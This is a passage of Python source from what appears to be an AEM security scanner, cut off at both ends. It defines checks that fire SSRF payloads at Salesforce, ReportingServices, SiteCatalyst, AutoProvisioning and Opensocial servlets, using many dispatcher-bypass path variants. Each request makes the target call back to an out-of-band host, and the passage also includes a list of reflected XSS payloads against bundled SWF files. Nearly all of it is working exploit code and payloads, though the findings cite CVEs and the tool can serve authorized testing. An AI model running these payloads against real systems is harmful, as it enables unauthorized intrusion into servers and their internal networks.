SALESFORCESERVLET2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET2)
SALESFORCESERVLET3 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
SALESFORCESERVLET3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET3)
for path in itertools.chain(SALESFORCESERVLET1, SALESFORCESERVLET2, SALESFORCESERVLET3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/salesforcesecret/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_salesforcesecret_servlet', url=url)
time.sleep(10)
if 'salesforcesecret' in d:
u = base64.b16decode(d.get('salesforcesecret')[0]).decode()
f = Finding('SalesforceSecretServlet', u,
'SSRF via SalesforceSecretServlet (CVE-2018-5006) was detected. '
'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
results.append(f)
return results
@register('reportingservices_servlet')
def ssrf_reportingservices_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
REPOSTINGSERVICESSERVLET1 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a'
)
REPOSTINGSERVICESSERVLET2 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a'
)
cache_buster = random_string()
REPOSTINGSERVICESSERVLET2 = (path.format(cache_buster) for path in REPOSTINGSERVICESSERVLET2)
REPOSTINGSERVICESSERVLET3 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a'
)
cache_buster = randint(0, 2**12)
REPOSTINGSERVICESSERVLET3 = (path.format(cache_buster) for path in REPOSTINGSERVICESSERVLET3)
for path in itertools.chain(REPOSTINGSERVICESSERVLET1, REPOSTINGSERVICESSERVLET2, REPOSTINGSERVICESSERVLET3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/reportingservices/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_reportingservices_servlet', url=url)
time.sleep(10)
if 'reportingservices' in d:
u = base64.b16decode(d.get('reportingservices')[0]).decode()
f = Finding('ReportingServicesServlet', u,
'SSRF via SalesforceSecretServlet (CVE-2018-12809) was detected. '
'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
results.append(f)
return results
@register('sitecatalyst_servlet')
def ssrf_sitecatalyst_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
SITECATALYST1 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy'
)
SITECATALYST2 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
)
cache_buster = random_string()
SITECATALYST2 = (path.format(cache_buster) for path in SITECATALYST2)
SITECATALYST3 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
)
cache_buster = randint(1, 2**12)
SITECATALYST3 = (path.format(cache_buster) for path in SITECATALYST3)
for path in itertools.chain(SITECATALYST1, SITECATALYST2, SITECATALYST3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/sitecatalyst/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_sitecatalyst_servlet', url=url)
time.sleep(10)
if 'sitecatalyst' in d:
u = base64.b16decode(d.get('sitecatalyst')[0]).decode()
f = Finding('SiteCatalystServlet', u,
'SSRF via SiteCatalystServlet was detected. '
'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
results.append(f)
return results
@register('autoprovisioning_servlet')
def ssrf_autoprovisioning_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
AUTOPROVISIONING1 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.json', '.4.2.1...json', '.1.json', '.html', '.html/a.1.json', '.html/a.4.2.1...json'
)
)
AUTOPROVISIONING1 = list('{0}{1}'.format(p1, p2) for p1, p2 in AUTOPROVISIONING1)
AUTOPROVISIONING2 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.json;%0a{0}.css', '.json;%0a{0}.png', '.html;%0a{0}.css', '.html;%0a{0}.png', '.json/{0}.css', '.json/{0}.js',
'.json/{0}.png', '.json/a.gif', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.json/{0}.html'
)
)
cache_buster = random_string()
AUTOPROVISIONING2 = list('{0}{1}'.format(p1, p2.format(cache_buster)) for p1, p2 in AUTOPROVISIONING2)
AUTOPROVISIONING3 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.{0}.css', '.{0}.js', '.{0}.ico', '.{0}.png', '.{0}.jpeg', '.{0}.gif'
)
)
cache_buster = randint(1, 2**12)
AUTOPROVISIONING3 = list('{0}{1}'.format(p1, p2.format(cache_buster)) for p1, p2 in AUTOPROVISIONING3)
for path in itertools.chain(AUTOPROVISIONING1, AUTOPROVISIONING2, AUTOPROVISIONING3):
url = normalize_url(base_url, path)
enc_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/autoprovisioning/{2}/'.format(my_host, token, enc_orig_url)
data = 'servicename=analytics&analytics.server={0}&analytics.company=1&analytics.username=2&analytics.secret=3&analytics.reportsuite=4'
data = data.format(back_url)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
try:
http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_autoprovisioning_servlet', url=url)
time.sleep(10)
if 'autoprovisioning' in d:
u = base64.b16decode(d.get('autoprovisioning')[0]).decode()
f = Finding('AutoProvisioningServlet', u,
'SSRF via AutoProvisioningServlet was detected. '
'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
results.append(f)
return results
@register('opensocial_proxy')
def ssrf_opensocial_proxy(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
OPENSOCIAL1 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'', '.json', '.1.json', '.4.2.1...json', '.html'
)
)
OPENSOCIAL1 = list(pair[0].format(pair[1]) for pair in OPENSOCIAL1)
OPENSOCIAL2 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', ';%0a{0}.png', '/{0}.ico', './{0}.html'
)
)
cache_buster = random_string()
OPENSOCIAL2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL2)
OPENSOCIAL3 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
OPENSOCIAL3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL3)
for path in itertools.chain(OPENSOCIAL1, OPENSOCIAL2, OPENSOCIAL3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/opensocial/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_opensocial_proxy', url=url)
time.sleep(10)
if 'opensocial' in d:
u = base64.b16decode(d.get('opensocial')[0]).decode()
f = Finding('Opensocial (shindig) proxy', u,
'SSRF via Opensocial (shindig) proxy. '
'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=41')
results.append(f)
return results
@register('opensocial_makeRequest')
def ssrf_opensocial_makeRequest(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
MAKEREQUEST1 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'', '.json', '.1.json', '.4.2.1...json', '.html'
)
)
MAKEREQUEST1 = list(pair[0].format(pair[1]) for pair in MAKEREQUEST1)
MAKEREQUEST2 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', ';%0a{0}.png', '/{0}.ico', './{0}.html'
)
)
cache_buster = random_string()
MAKEREQUEST2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST2)
MAKEREQUEST3 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
MAKEREQUEST3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST3)
for path in itertools.chain(MAKEREQUEST1, MAKEREQUEST2, MAKEREQUEST3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/opensocialmakerequest/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
data = 'httpMethod=GET'
http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_opensocial_makeRequest', url=url)
time.sleep(10)
if 'opensocialmakerequest' in d:
u = base64.b16decode(d.get('opensocialmakerequest')[0]).decode()
f = Finding('Opensocial (shindig) makeRequest', u,
'SSRF via Opensocial (shindig) makeRequest. Yon can specify parameters httpMethod, postData, headers, contentType for makeRequest.')
results.append(f)
return results
@register('swf_xss')
def swf_xss(base_url, my_host, debug=False, proxy=None):
SWFS = (
'/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=javascript:confirm(document.domain)',
'/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf.res?onclick=javascript:confirm(document.domain)',
'/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
'/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf.res?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
'/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String',
'/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf.res?javascriptCallbackFunction=alert(document.domain)-String',
'/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/dam/widgets/resources/swfupload/swfupload_f9.swf.res?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/cq/ui/resources/swfupload/swfupload.swf.res?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window',
'/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window',
'/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
'/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf.res?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
'/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window',
'/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window'
)
results = []
for path in SWFS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
ct = content_type(resp.headers.get('Content-Type', ''))
cd = resp.headers.get('Content-Disposition', '')
if resp.status_code == 200 and ct == 'application/x-shockwave-flash' and not cd:
f = Finding('Reflected XSS via SWF', url,
'AEM exposes SWF that might be vulnerable to reflected XSS. '
'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=61')
results.append(f)
except:
if debug:
error('Exception while performing a check', check='swf_xss', url=url)
return results
@register('externaljob_servlet')
def deser_externaljob_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
